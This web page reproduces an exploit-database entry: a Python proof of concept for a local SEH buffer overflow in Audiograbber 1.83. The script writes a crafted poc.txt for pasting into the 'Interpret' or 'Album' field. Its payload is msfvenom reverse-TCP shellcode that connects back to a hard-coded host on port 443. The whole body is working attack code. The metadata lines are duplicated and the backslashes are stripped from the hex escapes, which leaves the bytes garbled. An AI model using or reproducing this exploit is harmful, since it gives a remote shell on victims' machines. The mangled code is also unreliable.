Audiograbber 1.83 Buffer Overflow

Details
Category: Vulnerabilities
Hits: 292
# Exploit Title: Audiograbber 1.83 - Local Buffer Overflow (SEH)
# Date: 2018-06-16
# Exploit Author: Dennis 'dhn' Herrmann
# Vendor Homepage: https://www.audiograbber.org/
# Date: 2018-06-16
# Exploit Author: Dennis 'dhn' Herrmann
# Vendor Homepage: https://www.audiograbber.org/
# Version: 1.83
# Tested on: Windows 7 SP1 (x86)

#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/06/16 13:25:59 dhn Exp $
#
# Tested with Windows 7 SP1 (x86)
# Steps:
# - Paste "poc.txt" content in the "Interpret" or "Album" field

class Exploit:

def __init__(self, shellcode):
self._shellcode = shellcode
self._payload = None

def __write(self):
f = open("poc.txt", "w")
f.write(self._payload)
f.close()

def run(self):
pattern = "A" * 256
jmp_short = "xebx08x90x90" # short JMP
pop2ret = "x79x91x01x10" # WMA8Connect.dll

self._payload = pattern
self._payload += jmp_short
self._payload += pop2ret

# The buffer is mangled so we have to jump
# over the parts to reached our shellcode
self._payload += "x90" * 18 + jmp_short
self._payload += "x90" * 28 + jmp_short
self._payload += "x90" * 32 + self._shellcode

self.__write()

def main():
# msfvenom --platform windows -p windows/shell_reverse_tcp
# LHOST=10.168.142.129 LPORT=443 -b "x00x0ax0d"
# -e x86/alpha_mixed -f py
shellcode = (
"xdaxcdxd9x74x24xf4x59x49x49x49x49x49x49"
"x49x49x49x49x43x43x43x43x43x43x43x37x51"
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51"
"x32x41x42x32x42x42x30x42x42x41x42x58x50"
"x38x41x42x75x4ax49x39x6cx59x78x6fx72x77"
"x70x73x30x73x30x43x50x4ex69x6bx55x55x61"
"x69x50x32x44x6cx4bx76x30x70x30x6ex6bx50"
"x52x54x4cx4cx4bx72x72x47x64x6cx4bx74x32"
"x46x48x36x6fx6dx67x73x7ax67x56x74x71x6b"
"x4fx4ex4cx37x4cx51x71x53x4cx53x32x34x6c"
"x75x70x59x51x78x4fx56x6dx73x31x79x57x6b"
"x52x4bx42x71x42x56x37x4cx4bx63x62x74x50"
"x6ex6bx52x6ax57x4cx4cx4bx42x6cx54x51x32"
"x58x4dx33x37x38x57x71x58x51x76x31x4ex6b"
"x33x69x31x30x37x71x4ex33x6ex6bx61x59x47"
"x68x4ax43x47x4ax43x79x4ex6bx76x54x6ex6b"
"x37x71x38x56x74x71x59x6fx4cx6cx4bx71x78"
"x4fx36x6dx36x61x68x47x75x68x6bx50x70x75"
"x39x66x55x53x31x6dx4cx38x35x6bx73x4dx71"
"x34x62x55x4ax44x73x68x4cx4bx31x48x61x34"
"x76x61x58x53x30x66x6ex6bx76x6cx50x4bx4e"
"x6bx31x48x35x4cx67x71x59x43x4cx4bx37x74"
"x4cx4bx53x31x4ex30x4bx39x33x74x55x74x45"
"x74x73x6bx43x6bx31x71x31x49x53x6ax43x61"
"x4bx4fx79x70x63x6fx73x6fx70x5ax4cx4bx64"
"x52x5ax4bx6cx4dx43x6dx52x48x30x33x67x42"
"x37x70x73x30x35x38x34x37x53x43x76x52x33"
"x6fx53x64x63x58x30x4cx33x47x76x46x44x47"
"x6bx4fx38x55x6dx68x4ax30x37x71x47x70x47"
"x70x55x79x69x54x76x34x46x30x35x38x45x79"
"x6dx50x70x6bx57x70x79x6fx4ax75x56x30x56"
"x30x30x50x46x30x73x70x30x50x43x70x72x70"
"x62x48x4bx5ax44x4fx59x4fx6dx30x49x6fx7a"
"x75x7ax37x51x7ax55x55x53x58x76x6ax6ex48"
"x4cx4ex6ex61x73x58x44x42x67x70x47x71x4f"
"x4bx4dx59x4dx36x53x5ax34x50x70x56x76x37"
"x31x78x6ex79x49x35x44x34x53x51x49x6fx68"
"x55x6dx55x6fx30x50x74x36x6cx69x6fx50x4e"
"x56x68x52x55x6ax4cx73x58x6ax50x58x35x6c"
"x62x46x36x59x6fx48x55x32x48x43x53x30x6d"
"x63x54x77x70x6fx79x78x63x56x37x32x77x46"
"x37x50x31x59x66x32x4ax46x72x53x69x62x76"
"x79x72x59x6dx52x46x59x57x63x74x51x34x37"
"x4cx76x61x66x61x6cx4dx61x54x44x64x42x30"
"x6bx76x73x30x42x64x63x64x52x70x31x46x51"
"x46x50x56x42x66x30x56x62x6ex71x46x76x36"
"x36x33x71x46x42x48x74x39x7ax6cx55x6fx4f"
"x76x59x6fx6bx65x4bx39x59x70x70x4ex66x36"
"x30x46x59x6fx64x70x31x78x67x78x6cx47x67"
"x6dx35x30x49x6fx78x55x4dx6bx58x70x6dx65"
"x6fx52x36x36x73x58x6cx66x7ax35x4dx6dx6d"
"x4dx59x6fx59x45x75x6cx53x36x31x6cx47x7a"
"x6dx50x49x6bx79x70x70x75x36x65x6fx4bx77"
"x37x62x33x61x62x70x6fx71x7ax45x50x61x43"
"x6bx4fx69x45x41x41"
)

exploit = Exploit(shellcode)
exploit.run()


if __name__ == "__main__":
main()